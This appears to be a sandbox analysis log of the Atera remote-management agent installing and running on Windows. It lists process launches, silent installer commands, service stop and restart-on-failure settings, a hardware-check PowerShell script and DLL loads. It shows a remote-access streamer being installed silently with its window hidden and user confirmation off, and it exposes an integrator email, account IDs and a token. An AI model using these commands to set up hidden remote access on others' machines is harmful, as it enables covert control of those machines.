                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding BF843BCBC9EBED5C34216282DB92822DJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 3A3D5EBA34EB9624AE48E4F4D08FECDB E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe" /i /IntegratorLogin="contato@fazendadoscordeiros.com.br" /CompanyId="1" /IntegratorLoginUI="" /CompanyIdUI="" /FolderId="" /AccountId="001Q300000P2oAPIAZ" /AgentId="52187e48-563c-468d-9785-3542f81fb412"Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding 512046948B0983DC32EDE392DA99D036 E Global\MSI0000Jump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\System32\msiexec.exeProcess created: unknown unknownJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2D79.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893046 2 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentIdJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI2FBD.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6893546 6 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStartJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI3FBB.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6897625 10 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ShouldContinueInstallationJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI56F2.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6903546 32 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiEndJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\net.exe "NET" STOP AteraAgentJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\taskkill.exe "TaskKill.exe" /f /im AteraAgent.exeJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeProcess created: C:\Windows\SysWOW64\net1.exe C:\Windows\system32\net1 STOP AteraAgentJump to behavior
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "cb3e2cb9-55c1-438a-8389-94c341441cc1" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "b007e062-743d-47e1-a870-a586f83a0d8d" agent-api.atera.com/Production 443 or8ixLi90Mf "minimalIdentification" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "8786f2fa-f7ec-48f3-845c-8cd509c85e9f" agent-api.atera.com/Production 443 or8ixLi90Mf "identified" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe" 52187e48-563c-468d-9785-3542f81fb412 "1b6d15b4-846f-4811-aa62-e314f5d5945b" agent-api.atera.com/Production 443 or8ixLi90Mf "generalinfo fromGui" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe" 52187e48-563c-468d-9785-3542f81fb412 "1aa92b0c-e5fb-4470-8edf-86a7f92c710d" agent-api.atera.com/Production 443 or8ixLi90Mf "install eyJSbW1Db2RlIjoiaFpDREZQaEs3NW1KIiwiUmVxdWVzdFBlcm1pc3Npb25PcHRpb24iOm51bGwsIlJlcXVpcmVQYXNzd29yZE9wdGlvbiI6bnVsbCwiUGFzc3dvcmQiOm51bGx9" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Windows\System32\sc.exe "C:\Windows\System32\sc.exe" failure AteraAgent reset= 600 actions= restart/25000
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe" 52187e48-563c-468d-9785-3542f81fb412 "e82d88f8-5758-4c6f-9f7b-8b023b21ca56" agent-api.atera.com/Production 443 or8ixLi90Mf "checkforupdates" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe" 52187e48-563c-468d-9785-3542f81fb412 "c4c25269-0a4b-4daf-adc0-e2db93d9b9dd" agent-api.atera.com/Production 443 or8ixLi90Mf "maintain" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe" 52187e48-563c-468d-9785-3542f81fb412 "440dfd42-8399-4319-8ab9-c9695127bb3a" agent-api.atera.com/Production 443 or8ixLi90Mf "pollAll" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe" 52187e48-563c-468d-9785-3542f81fb412 "625a9ffc-3a6c-4d9d-b846-9cb0081c4ad4" agent-api.atera.com/Production 443 or8ixLi90Mf "syncinstalledapps" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSystemTools\AgentPackageSystemTools.exe" 52187e48-563c-468d-9785-3542f81fb412 "c714c0bb-2ce8-418e-929f-2ec4a445cfb0" agent-api.atera.com/Production 443 or8ixLi90Mf "probe" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe "C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe" 52187e48-563c-468d-9785-3542f81fb412 "f6b70a2c-1bfd-4903-a0e1-81c5afac28c1" agent-api.atera.com/Production 443 or8ixLi90Mf "monitor" 001Q300000P2oAPIAZ
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeProcess created: unknown unknown
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -Command " ################################################################################################ # Windows 11 Compatibility Check Script # ################################################################################################ # Compatibility flag $IsCompatible = $true # Check if current OS is Windows 10 $OSVersion = (Get-CimInstance -Class Win32_OperatingSystem).Caption if (-not $OSVersion.Contains('Windows 10')) { return } # Architecture x64 $Arch = (Get-CimInstance -Class CIM_ComputerSystem).SystemType $ArchValue = 'x64-based PC' if ($Arch -ne $ArchValue) { $IsCompatible = $false } # Screen Resolution $ScreenInfo = (Get-CimInstance -ClassName Win32_VideoController).CurrentVerticalResolution $ValueMin = 720 if ($ScreenInfo -le $ValueMin) { $IsCompatible = $false } # CPU composition $Core = (Get-CimInstance -Class CIM_Processor | Select-Object *).NumberOfCores $CoreValue = 2 $Frequency = (Get-CimInstance -Class CIM_Processor | Select-Object *).MaxClockSpeed $FrequencyValue = 1000 if (-not (($Core -ge $CoreValue) -and ($Frequency -ge $FrequencyValue))) { $IsCompatible = $false } # TPM $TPM2 = $false if ((Get-Tpm).ManufacturerVersionFull20) { $TPM2 = -not (Get-Tpm).ManufacturerVersionFull20.Contains('not supported') } if ($TPM2 -contains $false) { $IsCompatible = $false } # Secure Boot $SecureBoot = Confirm-SecureBootUEFI if ($SecureBoot -ne $true) { $IsCompatible = $false } # RAM available $Memory = (Get-CimInstance -Class CIM_ComputerSystem).TotalPhysicalMemory $SetMinMemory = 4294967296 if ($Memory -lt $SetMinMemory) { $IsCompatible = $false } # Storage available $ListDisk = Get-CimInstance -Class Win32_LogicalDisk | Where-Object { $_.DriveType -eq '3' } $SetMinSizeLimit = 64GB $DiskCompatible = $false foreach ($Disk in $ListDisk) { if ($Disk.FreeSpace -ge $SetMinSizeLimit) { $DiskCompatible = $true } } if (-not $DiskCompatible) { $IsCompatible = $false } # Output final result $IsCompatible "
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeProcess created: C:\Windows\Temp\SplashtopStreamer.exe "C:\Windows\TEMP\SplashtopStreamer.exe" prevercheck /s /i sec_opt=0,confirm_d=0,hidewindow=1
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cscript.exe cscript "C:\Program Files (x86)\Microsoft Office\Office16\ospp.vbs" /dstatus
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exeProcess created: C:\Windows\System32\msiexec.exe "msiexec.exe" /i C:\Windows\TEMP\ateraAgentSetup64_1_8_7_2.msi /lv* AteraSetupLog.txt /qn /norestart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI5085.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6967703 37 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.GenerateAgentId
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Windows\Installer\MSI5885.tmp",zzzzInvokeManagedCustomActionOutOfProc SfxCA_6969500 41 AlphaControlAgentInstallation!AlphaControlAgentInstallation.CustomActions.ReportMsiStart
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\SysWOW64\msiexec.exeProcess created: unknown unknown
                                Source: C:\Windows\Temp\SplashtopStreamer.exeProcess created: unknown unknown
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textinputframework.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coreuicomponents.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: coremessaging.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wintypes.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msihnd.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: srclient.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: spp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: powrprof.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vssapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vsstrace.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: umpdc.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dllJump to behavior
                                Source: C:\Windows\System32\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cabinet.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: mpr.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: wkscli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: samcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: samcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: dsrole.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: wkscli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: logoncli.dll
                                Source: C:\Windows\SysWOW64\net1.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: framedynos.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: dbghelp.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: srvcli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: netutils.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: winsta.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\taskkill.exeSection loaded: profapi.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: mscoree.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: apphelp.dll
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeSection loaded: kernel.appcore.dll
